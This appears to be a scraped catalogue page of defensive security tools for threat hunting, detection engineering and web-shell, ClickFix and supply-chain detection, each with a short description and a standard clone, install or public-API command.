Tools, modules, and field-ready utilities for threat hunting, detection engineering, and security operations.
ASR Configurator, Essentials and Atomic Testing. Configure and test Attack Surface Reduction rules.
Finding ClickFix and FakeCAPTCHA like it's 1999. Detection and hunting tools for clipboard hijacking attacks.
PowerShell tools to help defenders hunt smarter, hunt harder. A collection of scripts, queries, and techniques for threat hunting using PowerShell.
The home of the SDDLMaker. Parse, create, and understand SDDL strings.
SQL, IIS, Oh My... Detection and hunting tools for SQL Server and IIS security.
ShellSweeping the evil. PowerShell/Python/Lua tool to detect potential web shells using entropy analysis, machine learning, and YARA rules.
Finding ClickFix and FakeCAPTCHA like it's 1999. Detection and hunting tools for clipboard hijacking attacks.
Visit https://mhaggis.github.io/ClickGrab/ or git clone https://github.com/MHaggis/ClickGrab.git Interactive PowerShell framework for testing WMI, COM, LOLBAS, and persistence techniques. Built for red team testing and defense validation.
git clone https://github.com/MHaggis/NEBULA.git && Import-Module .\NEBULA.psm1 && Invoke-NEBULA Weekly YouTube show exploring atomic tests, detection engineering, and security research. Live demonstrations and deep dives into attack techniques.
Subscribe at youtube.com/@atomicsonafriday Living Off The Land Drivers - A curated list of Windows drivers used by adversaries to bypass security controls. The definitive resource for vulnerable driver detection.
curl -s https://www.loldrivers.io/api/drivers.json | jq PowerShell tools to help defenders hunt smarter, hunt harder. A collection of scripts, queries, and techniques for threat hunting using PowerShell.
git clone https://github.com/MHaggis/PowerShell-Hunter.git && cd PowerShell-Hunter && Import-Module .\PSHunter.psm1 Sources, configuration and how to detect evil things utilizing Microsoft Sysmon. A comprehensive collection of Sysmon configurations, documentation, and detection resources.
git clone https://github.com/MHaggis/sysmon-dfir.git && sysmon64.exe -accepteula -i sysmon-dfir\sysmonconfig.xml Living Off The Land Remote Monitoring & Management - A curated list of RMM tools abused by adversaries for persistence and lateral movement.
Visit https://lolrmm.io/ to explore RMM tools and detection strategies Collection of useful, up to date, Carbon Black Response Queries for threat hunting and detection.
git clone https://github.com/MHaggis/CBR-Queries.git A curated list of known malicious bootloaders for various operating systems. Track and catalog bootloader threats with detection rules and hash prevention.
curl -s https://www.bootloaders.io/api/bootloaders.json | jq ShellSweeping the evil. PowerShell/Python/Lua tool to detect potential web shells using entropy analysis, machine learning, and YARA rules.
git clone https://github.com/splunk/ShellSweep.git && .\ShellSweep\ShellSweep.ps1 ASR Configurator, Essentials and Atomic Testing. Configure and test Attack Surface Reduction rules.
Visit https://asrgen.streamlit.app/ or git clone https://github.com/MHaggis/ASRGEN.git SQL, IIS, Oh My... Detection and hunting tools for SQL Server and IIS security.
git clone https://github.com/MHaggis/SequelEyes.git && Import-Module .\SequelEyes.psm1 The home of the SDDLMaker. Parse, create, and understand SDDL strings.
git clone https://github.com/MHaggis/SDDLMaker.git && pip install -r requirements.txt A Public Package Scanner for The Community. Scan npm packages for supply chain threats.
git clone https://github.com/MHaggis/Package-Inferno.git && pip install -r requirements.txt Heap leak detection utilities for security research and analysis.
git clone https://github.com/MHaggis/HeapLeakDetection.git Helping defenders learn and validate npm supply-chain detections with safe atomic tests.
git clone https://github.com/MHaggis/NPM-Threat-Emulation.git Lists of sources and utilities utilized to hunt, detect and prevent evildoers. A curated collection of security resources.
git clone https://github.com/MHaggis/hunt-detect-prevent.git AppLocker Policy Generator. Create and manage AppLocker policies programmatically.
Visit https://applockergen.streamlit.app/ or git clone https://github.com/MHaggis/AppLockerGen.git MSIX Building Made Easy for Defenders. Create MSIX packages for testing and analysis.
git clone https://github.com/MHaggis/MSIXBuilder.git && Import-Module .\MSIXBuilder.psm1 Full of public notes and utilities. A collection of technical notes, scripts, and security research documentation.
git clone https://github.com/MHaggis/notes.git A Splunk app for visualizing and analyzing Sysmon data. Dashboards and saved searches for effective Sysmon analysis.
Download the app package and install via Splunk > Apps > Install from File A combination of OffensiveLua and Learning Lua - By Defenders, for Defenders.
git clone https://github.com/MHaggis/AtomicLua.git SigZap is a Streamlit application designed to facilitate the search across multiple network signature sets at once.
git clone https://github.com/MHaggis/sigZap.git && pip install -r requirements.txt && streamlit run app.py LLM tools and toys for security research and experimentation.
git clone https://github.com/MHaggis/LLM.git No modules found matching your criteria.